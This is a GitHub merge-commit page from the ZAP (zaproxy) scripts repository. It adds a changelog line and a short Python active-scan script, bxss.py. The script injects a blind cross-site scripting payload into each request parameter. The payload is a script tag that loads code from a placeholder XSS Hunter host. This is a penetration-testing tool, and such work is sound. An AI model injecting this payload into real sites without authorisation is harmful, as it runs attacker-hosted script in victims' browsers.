Merge pull request #214 from knassar702/bxss

inject blind xss payloads
zaproxy · Nov 1, 2021 · a2cb847 · a2cb847
2 parents e1bb7ac + 9ea2c59
commit a2cb847
Show file tree

Hide file tree

Showing 2 changed files with 19 additions and 0 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -8,6 +8,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 - variant/CompoundCookies.js - An input vector script that handles splitting of compound cookies (Issue 6582).
 - active/corsair.py > An active scan script to check for CORS related issues.)
 - payloadgenerator/securerandom.js > A fuzzer payload generator script that uses Java's SecureRandom as it's source (related to issue 6892).
+- active/bxss.py > an active scan script for inject blind xss payloads to the parameters
 
 ## [13] - 2021-10-14
 ### Fixed

diff --git a/active/bxss.py b/active/bxss.py
@@ -0,0 +1,18 @@
+# by: Khaled Nassar @knassar702
+
+# YOUR XSSHUNTER PAYLOAD
+bxss = '"><script src="//yourusername.xss.ht"></script>'
+def scanNode(sas, msg):
+  pass
+
+
+def scan(sas, msg, param, value):
+
+  # Copy requests before reusing them
+  msg = msg.cloneRequest();
+
+  # setParam (message, parameterName, newValue)
+  sas.setParam(msg, param, bxss);
+
+  # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+  sas.sendAndReceive(msg, False, False);